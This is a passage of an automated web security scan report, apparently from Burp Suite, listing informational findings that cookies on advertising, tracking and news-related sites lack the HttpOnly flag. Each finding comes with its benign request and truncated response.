The following cookies were issued by the application and do not have the HttpOnly flag set:

ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:13 GMT; domain=.at.atwola.com
Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; path=/; expires=Sun, 04-Sep-11 01:36:13 GMT; domain=tacoda.at.atwola.com
TData=99999|^; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.132. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw; expires=Sun, 02-Oct-2011 01:01:17 GMT; path=/; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/741/mcclatchy/728x90/sacramento_sacbee?01AD=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw&01RI=5FB3F64412C0344&01NA=&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=14c82149-9fc3-4277-af4b-df6e89b3fc47; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1104
Content-Type: application/javascript
Date: Sun, 04 Sep 2011 01:01:17 GMT
Connection: close
Set-Cookie: D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw; expires=Sun, 02-Oct-2011 01:01:17 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<div style='width:728px,height:90px;margin:0;border:0'>");

document.write(unescape('%3C%21--%20%20Rubicon%20Project%20Tag%20--%3E%0A%3C%21--%20%20Site%3A%20McClatchy%20%2
...[SNIP]...

14.133. http://tags.bluekai.com/site/2964 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2964

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e62ce11; expires=Tue, 06-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
bk=VaDKuLV5c/cze1lp; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
bkc=KJ0qyLl9y1qO0YOTnLZwARsORx3xgtF/Q1vwRDcymqARswj1jt9yw/lQcths8qLNGwJOB/0FOLHt+HYIBJx4hGUve6UMQI0cXxsoJO+c; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4GJ7Qr0xX99Nx1IQ==; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.134. http://tags.bluekai.com/site/38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/38

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e62c9c2; expires=Tue, 06-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
bk=LSg6zMqbInUze1lp; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.135. http://tags.bluekai.com/site/4449 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4449

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
bk=myAUzYJX+9Fze1lp; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.136. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e62c978; expires=Tue, 06-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
bk=tdEhIeqbInUze1lp; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
bkc=KJyfh1M9LabvQScijJ/4A1kyYWiLxIwcLYeTDG/1ecF8ZOCLpLzCIn0G49A8OCxIueI1dTtcQKsZeOBe6OGWdT9M/yod1h3dlyuP4NGakKdR0ReYO2AcTlB01EeLZzf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19tyLdwx==; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.137. http://tags.bluekai.com/site/4592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4592

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.138. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
dq=2|2|0|0; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
lm="4 Sep 2011 01:24:33 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.139. http://tu.connect.wunderloop.net/TU/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:54:50 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.140. http://tu.connect.wunderloop.net/TU2/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU2/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:43:57 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.141. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_yx7Fmxxchmux7Cx7Ech=[CS]v4|0-0|4E62D373[CE]; Expires=Fri, 2 Sep 2016 01:25:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.142. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
BizoData=Pp1FHRK43ZwxEqHtFj4aisdQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQ6is7u1bQQY8aj5XcunNcMDa7Re6IGD4lOeTENrYq3ZvAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrisu7VtBBjxqPldy6c1wwH4DELwm2ipwNthjuRJX8ipa7TbwiiAhQOisLScEBcVisgQgNPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9up8HFkflmyEwieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.143. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/Jobseeker/Jobs/JobResults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.144. http://www.cars.com/go/advice/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/advice/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.145. http://www.cars.com/go/advice/shopping/cpo/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/advice/shopping/cpo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/advice/shopping/cpo/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.146. http://www.cars.com/go/kbb/kbbInput.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/kbb/kbbInput.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/kbb/kbbInput.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.147. http://www.cars.com/go/photogalleries/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/photogalleries/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/photogalleries/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.148. http://www.cars.com/go/search/advanced_search.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/search/advanced_search.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/search/advanced_search.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 01:25:20 GMT
Server: IBM_HTTP_Server
Location: http://www.cars.com/for-sale/advancedsearch.action
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cars.com/for
...[SNIP]...

14.149. http://www.cars.com/images/bttncapOrngR.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/images/bttncapOrngR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bttncapOrngR.gif HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 11 Sep 2003 03:21:42 GMT
ETag: "547bf-14a-4c7a9d80"
Accept-Ranges: bytes
Content-Length: 330
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:44:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/gif
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

GIF89a.......................{I.uD.i0.e+._#.W..b=.na.R..I..M..G..E..D..F..A..?..=..;..9..6..?..4.eE6.3.RC<JBB.+.A@?.).M:1~(.O2$q$.>3.G/$^%
\..S..7..*..$..:..2... ......................................
...[SNIP]...

14.150. http://www.cars.com/images/long_back_orng.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/images/long_back_orng.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/long_back_orng.gif HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 23 Oct 2003 21:49:52 GMT
ETag: "54d8d-24c-aced4000"
Accept-Ranges: bytes
Content-Length: 588
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:44:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/gif
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

GIF89a$............................}L.~c.qF.j2..y.]..W..J..dU.F..D..N#.=..L(_ZZ.6.JHG.'..+.]-![...,+.........!.......,....$.......'~FU]h..l..p,.tm.x..|.....q(....r.l:...tJ.Z....).....X.P....z.n....|N.
...[SNIP]...

14.151. http://www.cars.com/includes/js/makemodels-used.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/includes/js/makemodels-used.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/makemodels-used.js HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 03 Sep 2011 16:46:10 GMT
ETag: "55fa6-45e9-370c9880"
Accept-Ranges: bytes
Content-Length: 17897
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 02:43:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: application/x-javascript
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

function initCars() { K(1,"Acura");D(1,"CL");D(1,"Integra");D(1,"Legend");D(1,"MDX");D(1,"NSX");D(1,"RDX");D(1,"RL");D(1,"RSX");
D(1,"SLX");D(1,"TL");D(1,"TSX");D(1,"Vigor");D(1,"ZDX");K(2,"Alfa Romeo
...[SNIP]...

14.152. http://www.cars.com/includes/js/used-car-widget_driver.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/includes/js/used-car-widget_driver.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/used-car-widget_driver.js HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 26 Jan 2011 16:26:35 GMT
ETag: "55619-152a-4bed04c0"
Accept-Ranges: bytes
Content-Length: 5418
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 02:43:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: application/x-javascript
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

// window.onerror=processError;

// variables used to change selection when "===" selected
var nModelPrevSelected = new Number(0);
var nMakePrevSelected = new Number(0);

var makes
...[SNIP]...

14.153. http://www.cars.com/test/widget/Custom/carslogo71x34.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/test/widget/Custom/carslogo71x34.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /test/widget/Custom/carslogo71x34.jpg HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:50 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 19 Feb 2009 15:30:07 GMT
ETag: "4655b-3454-36057dc0"
Accept-Ranges: bytes
Content-Length: 13396
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:43:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/jpeg
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:07 GMT; path=/

......JFIF.....,.,.....[Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS3 Windows.2009:01:30 16:29:40.........
...[SNIP]...

14.154. http://www.myspace.com/Modules/PostTo/Pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/Modules/PostTo/Pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sun, 11-Sep-2011 01:26:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.155. http://www.nbcudigitaladops.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nbcudigitaladops.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_nbc_blogs_80=3334722112.20480.0000; expires=Sun, 04-Sep-2011 05:28:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nbcudigitaladops.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:28:39 GMT
Connection: close
Set-Cookie: pers_cookie_insert_nbc_blogs_80=3334722112.20480.0000; expires=Sun, 04-Sep-2011 05:28:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

14.156. http://www.newslibrary.com/nlsearch.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newslibrary.com
Path:	/nlsearch.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:21 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
